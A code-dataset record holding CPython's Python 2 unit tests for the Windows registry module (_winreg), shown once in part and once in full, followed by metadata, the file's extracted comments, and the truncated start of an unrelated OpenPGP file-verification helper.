        DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_long_key(self):
        # Issue2810, in 2.6 and 3.1 when the key name was exactly 256
        # characters, EnumKey raised "WindowsError: More data is
        # available"
        name = 'x'*256
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
                SetValue(key, name, REG_SZ, 'x')
                num_subkeys, num_values, t = QueryInfoKey(key)
                EnumKey(key, 0)
        finally:
            with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
                DeleteKey(key, name)
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_dynamic_key(self):
        # Issue2810, when the value is dynamically generated, these
        # raise "WindowsError: More data is available" in 2.6 and 3.1
        try:
            EnumValue(HKEY_PERFORMANCE_DATA, 0)
        except OSError as e:
            if e.errno in (errno.EPERM, errno.EACCES):
                self.skipTest("access denied to registry key "
                              "(are you running in a non-interactive session?)")
            raise
        QueryValueEx(HKEY_PERFORMANCE_DATA, None)
    # Reflection requires XP x64/Vista at a minimum. XP doesn't have this stuff
    # or DeleteKeyEx so make sure their use raises NotImplementedError
    @unittest.skipUnless(WIN_VER < (5, 2), "Requires Windows XP")
    def test_reflection_unsupported(self):
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
                self.assertNotEqual(ck.handle, 0)
            key = OpenKey(HKEY_CURRENT_USER, test_key_name)
            self.assertNotEqual(key.handle, 0)
            with self.assertRaises(NotImplementedError):
                DisableReflectionKey(key)
            with self.assertRaises(NotImplementedError):
                EnableReflectionKey(key)
            with self.assertRaises(NotImplementedError):
                QueryReflectionKey(key)
            with self.assertRaises(NotImplementedError):
                DeleteKeyEx(HKEY_CURRENT_USER, test_key_name)
        finally:
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_setvalueex_value_range(self):
        # Test for Issue #14420, accept proper ranges for SetValueEx.
        # Py2Reg, which gets called by SetValueEx, was using PyLong_AsLong,
        # thus raising OverflowError. The implementation now uses
        # PyLong_AsUnsignedLong to match DWORD's size.
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
                self.assertNotEqual(ck.handle, 0)
                SetValueEx(ck, "test_name", None, REG_DWORD, 0x80000000)
        finally:
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_queryvalueex_return_value(self):
        # Test for Issue #16759, return unsigned int from QueryValueEx.
        # Reg2Py, which gets called by QueryValueEx, was returning a value
        # generated by PyLong_FromLong. The implementation now uses
        # PyLong_FromUnsignedLong to match DWORD's size.
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
                self.assertNotEqual(ck.handle, 0)
                test_val = 0x80000000
                SetValueEx(ck, "test_name", None, REG_DWORD, test_val)
                ret_val, ret_type = QueryValueEx(ck, "test_name")
                self.assertEqual(ret_type, REG_DWORD)
                self.assertEqual(ret_val, test_val)
        finally:
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
@unittest.skipUnless(REMOTE_NAME, "Skipping remote registry tests")
class RemoteWinregTests(BaseWinregTests):
    # Runs the full write/read/delete cycle against a remote registry.
    def test_remote_registry_works(self):
        self._test_all(ConnectRegistry(REMOTE_NAME, HKEY_CURRENT_USER))
@unittest.skipUnless(WIN64_MACHINE, "x64 specific registry tests")
class Win64WinregTests(BaseWinregTests):
    # WOW64 redirection/reflection behaviour on 64-bit Windows.
    def test_reflection_functions(self):
        # Test that we can call the query, enable, and disable functions
        # on a key which isn't on the reflection list with no consequences.
        with OpenKey(HKEY_LOCAL_MACHINE, "Software") as key:
            # HKLM\Software is redirected but not reflected in all OSes
            self.assertTrue(QueryReflectionKey(key))
            self.assertEqual(None, EnableReflectionKey(key))
            self.assertEqual(None, DisableReflectionKey(key))
            self.assertTrue(QueryReflectionKey(key))
    @unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
    def test_reflection(self):
        # Test that we can create, open, and delete keys in the 32-bit
        # area. Because we are doing this in a key which gets reflected,
        # test the differences of 32 and 64-bit keys before and after the
        # reflection occurs (ie. when the created key is closed).
        try:
            with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                             KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
                self.assertNotEqual(created_key.handle, 0)
                # The key should now be available in the 32-bit area
                with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                             KEY_ALL_ACCESS | KEY_WOW64_32KEY) as key:
                    self.assertNotEqual(key.handle, 0)
                # Write a value to what currently is only in the 32-bit area
                SetValueEx(created_key, "", 0, REG_SZ, "32KEY")
            # The key is not reflected until created_key is closed.
            # The 64-bit version of the key should not be available yet.
            open_fail = lambda: OpenKey(HKEY_CURRENT_USER,
                                        test_reflect_key_name, 0,
                                        KEY_READ | KEY_WOW64_64KEY)
            self.assertRaises(WindowsError, open_fail)
            # Now explicitly open the 64-bit version of the key
            with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                         KEY_ALL_ACCESS | KEY_WOW64_64KEY) as key:
                self.assertNotEqual(key.handle, 0)
                # Make sure the original value we set is there
                self.assertEqual("32KEY", QueryValue(key, ""))
                # Set a new value, which will get reflected to 32-bit
                SetValueEx(key, "", 0, REG_SZ, "64KEY")
            # Reflection uses a "last-writer wins" policy, so the value we set
            # on the 64-bit key should be the same on 32-bit
            with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                         KEY_READ | KEY_WOW64_32KEY) as key:
                self.assertEqual("64KEY", QueryValue(key, ""))
        finally:
            DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
                        KEY_WOW64_32KEY, 0)
    @unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
    def test_disable_reflection(self):
        # Make use of a key which gets redirected and reflected
        try:
            with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                             KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
                # QueryReflectionKey returns whether or not the key is disabled
                disabled = QueryReflectionKey(created_key)
                self.assertEqual(type(disabled), bool)
                # HKCU\Software\Classes is reflected by default
                self.assertFalse(disabled)
                DisableReflectionKey(created_key)
                self.assertTrue(QueryReflectionKey(created_key))
            # The key is now closed and would normally be reflected to the
            # 64-bit area, but let's make sure that didn't happen.
            open_fail = lambda: OpenKeyEx(HKEY_CURRENT_USER,
                                          test_reflect_key_name, 0,
                                          KEY_READ | KEY_WOW64_64KEY)
            self.assertRaises(WindowsError, open_fail)
            # Make sure the 32-bit key is actually there
            with OpenKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                           KEY_READ | KEY_WOW64_32KEY) as key:
                self.assertNotEqual(key.handle, 0)
        finally:
            DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
                        KEY_WOW64_32KEY, 0)
    def test_exception_numbers(self):
        # errno 2 == ERROR_FILE_NOT_FOUND for a missing registry value.
        with self.assertRaises(WindowsError) as ctx:
            QueryValue(HKEY_CLASSES_ROOT, 'some_value_that_does_not_exist')
        self.assertEqual(ctx.exception.errno, 2)
def test_main():
    # Delegate to test_support so resource/skip handling stays uniform.
    suites = (LocalWinregTests, RemoteWinregTests, Win64WinregTests)
    test_support.run_unittest(*suites)
if __name__ == "__main__":
    # Python 2 print statements: hint at how to enable the remote tests.
    if not REMOTE_NAME:
        print "Remote registry calls can be tested using",
        print "'test_winreg.py --remote \\\\machine_name'"
    test_main()
|
# Test the windows specific win32reg module.
# Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey
import os, sys, errno
import unittest
from test import test_support
threading = test_support.import_module("threading")
from platform import machine
# Do this first so test will be skipped if module doesn't exist
test_support.import_module('_winreg')
# Now import everything
from _winreg import *
try:
    # "--remote \\machine" on the command line targets a remote registry;
    # when absent the remote tests are skipped.
    REMOTE_NAME = sys.argv[sys.argv.index("--remote")+1]
except (IndexError, ValueError):
    REMOTE_NAME = None
# tuple of (major, minor)
WIN_VER = sys.getwindowsversion()[:2]
# Some tests should only run on 64-bit architectures where WOW64 will be.
WIN64_MACHINE = True if machine() == "AMD64" else False
# Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses
# registry reflection and formerly reflected keys are shared instead.
# Windows 7 and Windows Server 2008 R2 are version 6.1. Due to this, some
# tests are only valid up until 6.1
HAS_REFLECTION = True if WIN_VER < (6, 1) else False
# Use a per-process key to prevent concurrent test runs (buildbot!) from
# stomping on each other.
test_key_base = "Python Test Key [%d] - Delete Me" % (os.getpid(),)
test_key_name = "SOFTWARE\\" + test_key_base
# On OS'es that support reflection we should test with a reflected key
test_reflect_key_name = "SOFTWARE\\Classes\\" + test_key_base
# (value name, value data, registry type) triples written and read back.
test_data = [
    ("Int Value", 45, REG_DWORD),
    ("String Val", "A string value", REG_SZ),
    ("StringExpand", "The path is %path%", REG_EXPAND_SZ),
    ("Multi-string", ["Lots", "of", "string", "values"], REG_MULTI_SZ),
    ("Raw Data", ("binary"+chr(0)+"data"), REG_BINARY),
    ("Big String", "x"*(2**14-1), REG_SZ),
    ("Big Binary", "x"*(2**14), REG_BINARY),
]
# Python 2 only: also exercise unicode names and values.
if test_support.have_unicode:
    test_data += [
        (unicode("Unicode Val"), unicode("A Unicode value"), REG_SZ,),
        ("UnicodeExpand", unicode("The path is %path%"), REG_EXPAND_SZ),
        ("Multi-unicode", [unicode("Lots"), unicode("of"), unicode("unicode"),
                           unicode("values")], REG_MULTI_SZ),
        ("Multi-mixed", [unicode("Unicode"), unicode("and"), "string",
                         "values"], REG_MULTI_SZ),
    ]
class BaseWinregTests(unittest.TestCase):
    """Shared machinery for the _winreg tests.

    Writes a known set of values under a per-process test key, reads them
    back, and deletes them again; concrete subclasses run these helpers
    against the local registry, a remote registry, or WOW64 views.
    """
    def setUp(self):
        # Make sure that the test key is absent when the test
        # starts.
        self.delete_tree(HKEY_CURRENT_USER, test_key_name)
    def delete_tree(self, root, subkey):
        """Recursively delete ``subkey`` (and all of its children) under ``root``."""
        try:
            hkey = OpenKey(root, subkey, KEY_ALL_ACCESS)
        except WindowsError:
            # subkey does not exist
            return
        while True:
            try:
                # Always enumerate index 0: each deletion shifts the rest down.
                subsubkey = EnumKey(hkey, 0)
            except WindowsError:
                # no more subkeys
                break
            self.delete_tree(hkey, subsubkey)
        CloseKey(hkey)
        DeleteKey(root, subkey)
    def _write_test_data(self, root_key, CreateKey=CreateKey):
        """Create the test key plus a sub-key holding every ``test_data`` value.

        ``CreateKey`` can be overridden so the same flow also exercises the
        extended CreateKeyEx variant.
        """
        # Set the default value for this key.
        SetValue(root_key, test_key_name, REG_SZ, "Default value")
        key = CreateKey(root_key, test_key_name)
        # Create a sub-key
        sub_key = CreateKey(key, "sub_key")
        # Give the sub-key some named values
        for value_name, value_data, value_type in test_data:
            SetValueEx(sub_key, value_name, 0, value_type, value_data)
        # Check we wrote as many items as we thought.
        nkeys, nvalues, since_mod = QueryInfoKey(key)
        self.assertEqual(nkeys, 1, "Not the correct number of sub keys")
        self.assertEqual(nvalues, 1, "Not the correct number of values")
        nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
        self.assertEqual(nkeys, 0, "Not the correct number of sub keys")
        self.assertEqual(nvalues, len(test_data),
                         "Not the correct number of values")
        # Close this key this way...
        # (but before we do, copy the key as an integer - this allows
        # us to test that the key really gets closed).
        int_sub_key = int(sub_key)
        CloseKey(sub_key)
        try:
            QueryInfoKey(int_sub_key)
            self.fail("It appears the CloseKey() function does "
                      "not close the actual key!")
        except EnvironmentError:
            pass
        # ... and close that key that way :-)
        int_key = int(key)
        key.Close()
        try:
            QueryInfoKey(int_key)
            self.fail("It appears the key.Close() function "
                      "does not close the actual key!")
        except EnvironmentError:
            pass
    def _read_test_data(self, root_key, OpenKey=OpenKey):
        """Read back everything ``_write_test_data`` wrote and verify it.

        ``OpenKey`` can be overridden to exercise the OpenKeyEx variant.
        """
        # Check we can get default value for this key.
        val = QueryValue(root_key, test_key_name)
        self.assertEqual(val, "Default value",
                         "Registry didn't give back the correct value")
        key = OpenKey(root_key, test_key_name)
        # Read the sub-keys
        with OpenKey(key, "sub_key") as sub_key:
            # Check I can enumerate over the values.
            index = 0
            while 1:
                try:
                    data = EnumValue(sub_key, index)
                except EnvironmentError:
                    break
                self.assertIn(data, test_data,
                              "Didn't read back the correct test data")
                index = index + 1
            self.assertEqual(index, len(test_data),
                             "Didn't read the correct number of items")
            # Check I can directly access each item
            for value_name, value_data, value_type in test_data:
                read_val, read_typ = QueryValueEx(sub_key, value_name)
                self.assertEqual(read_val, value_data,
                                 "Could not directly read the value")
                self.assertEqual(read_typ, value_type,
                                 "Could not directly read the value")
        sub_key.Close()
        # Enumerate our main key.
        read_val = EnumKey(key, 0)
        self.assertEqual(read_val, "sub_key", "Read subkey value wrong")
        try:
            EnumKey(key, 1)
            self.fail("Was able to get a second key when I only have one!")
        except EnvironmentError:
            pass
        key.Close()
    def _delete_test_data(self, root_key):
        """Delete the values and keys that ``_write_test_data`` created."""
        key = OpenKey(root_key, test_key_name, 0, KEY_ALL_ACCESS)
        sub_key = OpenKey(key, "sub_key", 0, KEY_ALL_ACCESS)
        # It is not necessary to delete the values before deleting
        # the key (although subkeys must not exist).  We delete them
        # manually just to prove we can :-)
        for value_name, value_data, value_type in test_data:
            DeleteValue(sub_key, value_name)
        nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
        self.assertEqual(nkeys, 0, "subkey not empty before delete")
        self.assertEqual(nvalues, 0, "subkey not empty before delete")
        sub_key.Close()
        DeleteKey(key, "sub_key")
        try:
            # Shouldn't be able to delete it twice!
            DeleteKey(key, "sub_key")
            self.fail("Deleting the key twice succeeded")
        except EnvironmentError:
            pass
        key.Close()
        DeleteKey(root_key, test_key_name)
        # Opening should now fail!
        try:
            key = OpenKey(root_key, test_key_name)
            self.fail("Could open the non-existent key")
        except WindowsError: # Use this error name this time
            pass
    def _test_all(self, root_key):
        """Run the full write / read / delete round trip against ``root_key``."""
        self._write_test_data(root_key)
        self._read_test_data(root_key)
        self._delete_test_data(root_key)
class LocalWinregTests(BaseWinregTests):
    """Tests that run against the local machine's registry."""
    def test_registry_works(self):
        """Full round trip with the plain CreateKey/OpenKey functions."""
        self._test_all(HKEY_CURRENT_USER)
    def test_registry_works_extended_functions(self):
        """Full round trip using the *Ex variants of the key functions."""
        # Substitute the regular CreateKey and OpenKey calls with their
        # extended counterparts.
        # Note: DeleteKeyEx is not used here because it is platform dependent
        cke = lambda key, sub_key: CreateKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)
        self._write_test_data(HKEY_CURRENT_USER, cke)
        oke = lambda key, sub_key: OpenKeyEx(key, sub_key, 0, KEY_READ)
        self._read_test_data(HKEY_CURRENT_USER, oke)
        self._delete_test_data(HKEY_CURRENT_USER)
    def test_connect_registry_to_local_machine_works(self):
        # perform minimal ConnectRegistry test which just invokes it
        h = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
        self.assertNotEqual(h.handle, 0)
        h.Close()
        # A closed handle reports 0.
        self.assertEqual(h.handle, 0)
    def test_inexistant_remote_registry(self):
        """Connecting to a bogus machine name must raise WindowsError."""
        connect = lambda: ConnectRegistry("abcdefghijkl", HKEY_CURRENT_USER)
        self.assertRaises(WindowsError, connect)
    def test_expand_environment_strings(self):
        """ExpandEnvironmentStrings substitutes %var% and returns unicode."""
        r = ExpandEnvironmentStrings(u"%windir%\\test")
        self.assertEqual(type(r), unicode)
        self.assertEqual(r, os.environ["windir"] + "\\test")
    def test_context_manager(self):
        # ensure that the handle is closed if an exception occurs
        try:
            with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as h:
                self.assertNotEqual(h.handle, 0)
                raise WindowsError
        except WindowsError:
            self.assertEqual(h.handle, 0)
    def test_changing_value(self):
        # Issue2810: A race condition in 2.6 and 3.1 may cause
        # EnumValue or QueryValue to raise "WindowsError: More data is
        # available"
        done = False
        class VeryActiveThread(threading.Thread):
            # Rapidly alternates a value between short and long strings so
            # the main thread's reads race with size changes.
            def run(self):
                with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
                    use_short = True
                    long_string = 'x'*2000
                    while not done:
                        s = 'x' if use_short else long_string
                        use_short = not use_short
                        SetValue(key, 'changing_value', REG_SZ, s)
        thread = VeryActiveThread()
        thread.start()
        try:
            with CreateKey(HKEY_CURRENT_USER,
                           test_key_name+'\\changing_value') as key:
                for _ in range(1000):
                    num_subkeys, num_values, t = QueryInfoKey(key)
                    for i in range(num_values):
                        name = EnumValue(key, i)
                        QueryValue(key, name[0])
        finally:
            done = True
            thread.join()
            with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
                DeleteKey(key, 'changing_value')
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_long_key(self):
        # Issue2810, in 2.6 and 3.1 when the key name was exactly 256
        # characters, EnumKey raised "WindowsError: More data is
        # available"
        name = 'x'*256
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
                SetValue(key, name, REG_SZ, 'x')
                num_subkeys, num_values, t = QueryInfoKey(key)
                EnumKey(key, 0)
        finally:
            with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
                DeleteKey(key, name)
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_dynamic_key(self):
        # Issue2810, when the value is dynamically generated, these
        # raise "WindowsError: More data is available" in 2.6 and 3.1
        try:
            EnumValue(HKEY_PERFORMANCE_DATA, 0)
        except OSError as e:
            if e.errno in (errno.EPERM, errno.EACCES):
                self.skipTest("access denied to registry key "
                              "(are you running in a non-interactive session?)")
            raise
        QueryValueEx(HKEY_PERFORMANCE_DATA, None)
    # Reflection requires XP x64/Vista at a minimum. XP doesn't have this stuff
    # or DeleteKeyEx so make sure their use raises NotImplementedError
    @unittest.skipUnless(WIN_VER < (5, 2), "Requires Windows XP")
    def test_reflection_unsupported(self):
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
                self.assertNotEqual(ck.handle, 0)
            key = OpenKey(HKEY_CURRENT_USER, test_key_name)
            self.assertNotEqual(key.handle, 0)
            with self.assertRaises(NotImplementedError):
                DisableReflectionKey(key)
            with self.assertRaises(NotImplementedError):
                EnableReflectionKey(key)
            with self.assertRaises(NotImplementedError):
                QueryReflectionKey(key)
            with self.assertRaises(NotImplementedError):
                DeleteKeyEx(HKEY_CURRENT_USER, test_key_name)
        finally:
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_setvalueex_value_range(self):
        # Test for Issue #14420, accept proper ranges for SetValueEx.
        # Py2Reg, which gets called by SetValueEx, was using PyLong_AsLong,
        # thus raising OverflowError. The implementation now uses
        # PyLong_AsUnsignedLong to match DWORD's size.
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
                self.assertNotEqual(ck.handle, 0)
                # 0x80000000 overflows a signed 32-bit long but fits a DWORD.
                SetValueEx(ck, "test_name", None, REG_DWORD, 0x80000000)
        finally:
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
    def test_queryvalueex_return_value(self):
        # Test for Issue #16759, return unsigned int from QueryValueEx.
        # Reg2Py, which gets called by QueryValueEx, was returning a value
        # generated by PyLong_FromLong. The implementation now uses
        # PyLong_FromUnsignedLong to match DWORD's size.
        try:
            with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
                self.assertNotEqual(ck.handle, 0)
                test_val = 0x80000000
                SetValueEx(ck, "test_name", None, REG_DWORD, test_val)
                ret_val, ret_type = QueryValueEx(ck, "test_name")
                self.assertEqual(ret_type, REG_DWORD)
                self.assertEqual(ret_val, test_val)
        finally:
            DeleteKey(HKEY_CURRENT_USER, test_key_name)
@unittest.skipUnless(REMOTE_NAME, "Skipping remote registry tests")
class RemoteWinregTests(BaseWinregTests):
    """Round-trip test against a remote machine's registry (``--remote`` flag)."""
    def test_remote_registry_works(self):
        remote_key = ConnectRegistry(REMOTE_NAME, HKEY_CURRENT_USER)
        self._test_all(remote_key)
@unittest.skipUnless(WIN64_MACHINE, "x64 specific registry tests")
class Win64WinregTests(BaseWinregTests):
    """WOW64 redirection/reflection tests; only meaningful on 64-bit Windows."""
    def test_reflection_functions(self):
        # Test that we can call the query, enable, and disable functions
        # on a key which isn't on the reflection list with no consequences.
        with OpenKey(HKEY_LOCAL_MACHINE, "Software") as key:
            # HKLM\Software is redirected but not reflected in all OSes
            self.assertTrue(QueryReflectionKey(key))
            self.assertEqual(None, EnableReflectionKey(key))
            self.assertEqual(None, DisableReflectionKey(key))
            self.assertTrue(QueryReflectionKey(key))
    @unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
    def test_reflection(self):
        # Test that we can create, open, and delete keys in the 32-bit
        # area. Because we are doing this in a key which gets reflected,
        # test the differences of 32 and 64-bit keys before and after the
        # reflection occurs (ie. when the created key is closed).
        try:
            with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                             KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
                self.assertNotEqual(created_key.handle, 0)
                # The key should now be available in the 32-bit area
                with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                             KEY_ALL_ACCESS | KEY_WOW64_32KEY) as key:
                    self.assertNotEqual(key.handle, 0)
                # Write a value to what currently is only in the 32-bit area
                SetValueEx(created_key, "", 0, REG_SZ, "32KEY")
                # The key is not reflected until created_key is closed.
                # The 64-bit version of the key should not be available yet.
                open_fail = lambda: OpenKey(HKEY_CURRENT_USER,
                                            test_reflect_key_name, 0,
                                            KEY_READ | KEY_WOW64_64KEY)
                self.assertRaises(WindowsError, open_fail)
            # Now explicitly open the 64-bit version of the key
            with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                         KEY_ALL_ACCESS | KEY_WOW64_64KEY) as key:
                self.assertNotEqual(key.handle, 0)
                # Make sure the original value we set is there
                self.assertEqual("32KEY", QueryValue(key, ""))
                # Set a new value, which will get reflected to 32-bit
                SetValueEx(key, "", 0, REG_SZ, "64KEY")
            # Reflection uses a "last-writer wins" policy, so the value we set
            # on the 64-bit key should be the same on 32-bit
            with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                         KEY_READ | KEY_WOW64_32KEY) as key:
                self.assertEqual("64KEY", QueryValue(key, ""))
        finally:
            DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
                        KEY_WOW64_32KEY, 0)
    @unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
    def test_disable_reflection(self):
        # Make use of a key which gets redirected and reflected
        try:
            with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                             KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
                # QueryReflectionKey returns whether or not the key is disabled
                disabled = QueryReflectionKey(created_key)
                self.assertEqual(type(disabled), bool)
                # HKCU\Software\Classes is reflected by default
                self.assertFalse(disabled)
                DisableReflectionKey(created_key)
                self.assertTrue(QueryReflectionKey(created_key))
            # The key is now closed and would normally be reflected to the
            # 64-bit area, but let's make sure that didn't happen.
            open_fail = lambda: OpenKeyEx(HKEY_CURRENT_USER,
                                          test_reflect_key_name, 0,
                                          KEY_READ | KEY_WOW64_64KEY)
            self.assertRaises(WindowsError, open_fail)
            # Make sure the 32-bit key is actually there
            with OpenKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
                           KEY_READ | KEY_WOW64_32KEY) as key:
                self.assertNotEqual(key.handle, 0)
        finally:
            DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
                        KEY_WOW64_32KEY, 0)
    def test_exception_numbers(self):
        """A missing value raises WindowsError with errno 2 (file not found)."""
        with self.assertRaises(WindowsError) as ctx:
            QueryValue(HKEY_CLASSES_ROOT, 'some_value_that_does_not_exist')
        self.assertEqual(ctx.exception.errno, 2)
def test_main():
    """Entry point for regrtest: run every local/remote/x64 test class."""
    test_support.run_unittest(LocalWinregTests, RemoteWinregTests,
                              Win64WinregTests)
if __name__ == "__main__":
    # Hint at the optional remote mode when no remote machine was given
    # (REMOTE_NAME is parsed from the command line elsewhere in this file).
    if not REMOTE_NAME:
        print "Remote registry calls can be tested using",
        print "'test_winreg.py --remote \\\\machine_name'"
    test_main()
|
en
| 0.893769
|
# Test the windows specific win32reg module. # Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey # Do this first so test will be skipped if module doesn't exist # Now import everything # tuple of (major, minor) # Some tests should only run on 64-bit architectures where WOW64 will be. # Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses # registry reflection and formerly reflected keys are shared instead. # Windows 7 and Windows Server 2008 R2 are version 6.1. Due to this, some # tests are only valid up until 6.1 # Use a per-process key to prevent concurrent test runs (buildbot!) from # stomping on each other. # On OS'es that support reflection we should test with a reflected key # Make sure that the test key is absent when the test # starts. # subkey does not exist # no more subkeys # Set the default value for this key. # Create a sub-key # Give the sub-key some named values # Check we wrote as many items as we thought. # Close this key this way... # (but before we do, copy the key as an integer - this allows # us to test that the key really gets closed). # ... and close that key that way :-) # Check we can get default value for this key. # Read the sub-keys # Check I can enumerate over the values. # Check I can directly access each item # Enumerate our main key. # It is not necessary to delete the values before deleting # the key (although subkeys must not exist). We delete them # manually just to prove we can :-) # Shouldnt be able to delete it twice! # Opening should now fail! # Use this error name this time # Substitute the regular CreateKey and OpenKey calls with their # extended counterparts. 
# Note: DeleteKeyEx is not used here because it is platform dependent # perform minimal ConnectRegistry test which just invokes it # ensure that the handle is closed if an exception occurs # Issue2810: A race condition in 2.6 and 3.1 may cause # EnumValue or QueryValue to raise "WindowsError: More data is # available" # Issue2810, in 2.6 and 3.1 when the key name was exactly 256 # characters, EnumKey raised "WindowsError: More data is # available" # Issue2810, when the value is dynamically generated, these # raise "WindowsError: More data is available" in 2.6 and 3.1 # Reflection requires XP x64/Vista at a minimum. XP doesn't have this stuff # or DeleteKeyEx so make sure their use raises NotImplementedError # Test for Issue #14420, accept proper ranges for SetValueEx. # Py2Reg, which gets called by SetValueEx, was using PyLong_AsLong, # thus raising OverflowError. The implementation now uses # PyLong_AsUnsignedLong to match DWORD's size. # Test for Issue #16759, return unsigned int from QueryValueEx. # Reg2Py, which gets called by QueryValueEx, was returning a value # generated by PyLong_FromLong. The implmentation now uses # PyLong_FromUnsignedLong to match DWORD's size. # Test that we can call the query, enable, and disable functions # on a key which isn't on the reflection list with no consequences. # HKLM\Software is redirected but not reflected in all OSes # Test that we can create, open, and delete keys in the 32-bit # area. Because we are doing this in a key which gets reflected, # test the differences of 32 and 64-bit keys before and after the # reflection occurs (ie. when the created key is closed). # The key should now be available in the 32-bit area # Write a value to what currently is only in the 32-bit area # The key is not reflected until created_key is closed. # The 64-bit version of the key should not be available yet. 
# Now explicitly open the 64-bit version of the key # Make sure the original value we set is there # Set a new value, which will get reflected to 32-bit # Reflection uses a "last-writer wins policy, so the value we set # on the 64-bit key should be the same on 32-bit # Make use of a key which gets redirected and reflected # QueryReflectionKey returns whether or not the key is disabled # HKCU\Software\Classes is reflected by default # The key is now closed and would normally be reflected to the # 64-bit area, but let's make sure that didn't happen. # Make sure the 32-bit key is actually there
| 2.129838
| 2
|
fetchers/verifiers/OpenPGP.py
|
KOLANICH/fetchers.py
| 1
|
6628540
|
<reponame>KOLANICH/fetchers.py<filename>fetchers/verifiers/OpenPGP.py
import typing
from pathlib import Path
from . import Verifier
class OpenPGPVerifier(Verifier):
    """Verifier that checks downloaded files against detached OpenPGP signatures."""
    __slots__ = ("files2verify", "pgpBackend")
    marker = "OpenPGP"
    def __init__(self, files2verify: typing.Iterable[typing.Tuple[typing.Any, typing.Any, typing.Any, typing.Any]], backend=None) -> None:
        # Each item is a 4-tuple (file, signature, fingerprint, keyFile), as
        # unpacked in __call__; the previous Tuple[bytes, bytes] annotation
        # did not match that.  file/signature may each be a str (name under
        # the downloads dir), a Path, raw bytes, or a (name, bytes) pair.
        self.files2verify = files2verify
        if backend is None:
            # Lazily pick the default OpenPGP backend only when none is given.
            from OpenPGPAbs import ChosenBackend
            backend = ChosenBackend
        self.pgpBackend = backend()
    def __call__(self, downloadsDir: Path, downloadedTargets: typing.Iterable[str]) -> None:
        """Verify every configured file; raise if any downloaded target was not covered."""
        downloadedTargetsNames = set(downloadedTargets)
        def preprocessFile(f):
            # Normalizes f to raw bytes, resolving names/paths and marking
            # (name, bytes) pairs as verified.
            nonlocal downloadedTargetsNames
            if isinstance(f, str):
                # NOTE(review): a plain-str name is read from downloadsDir but
                # never removed from downloadedTargetsNames, so it is still
                # reported as "unverified" below — confirm this is intended.
                f = downloadsDir / f
            if isinstance(f, Path):
                f = f.read_bytes()
            elif isinstance(f, tuple):
                (name, f) = f
                downloadedTargetsNames -= {name}
            return f
        for file2Verify, signature, fingerprint, keyFile in self.files2verify:
            file2Verify = preprocessFile(file2Verify)
            signature = preprocessFile(signature)
            self.pgpBackend.verifyBlob(file2Verify, signature, keyFingerprint=fingerprint, keyFile=keyFile)
        if downloadedTargetsNames:
            # Any target not claimed by a (name, bytes) entry is unverified.
            raise Exception("Unverified files:", downloadedTargetsNames)
|
import typing
from pathlib import Path
from . import Verifier
class OpenPGPVerifier(Verifier):
__slots__ = ("files2verify", "pgpBackend")
marker = "OpenPGP"
def __init__(self, files2verify: typing.Iterable[typing.Tuple[bytes, bytes]], backend=None) -> None:
self.files2verify = files2verify
if backend is None:
from OpenPGPAbs import ChosenBackend
backend = ChosenBackend
self.pgpBackend = backend()
def __call__(self, downloadsDir: Path, downloadedTargets: typing.Iterable[str]) -> None:
downloadedTargetsNames = set(downloadedTargets)
def preprocessFile(f):
nonlocal downloadedTargetsNames
if isinstance(f, str):
f = downloadsDir / f
if isinstance(f, Path):
f = f.read_bytes()
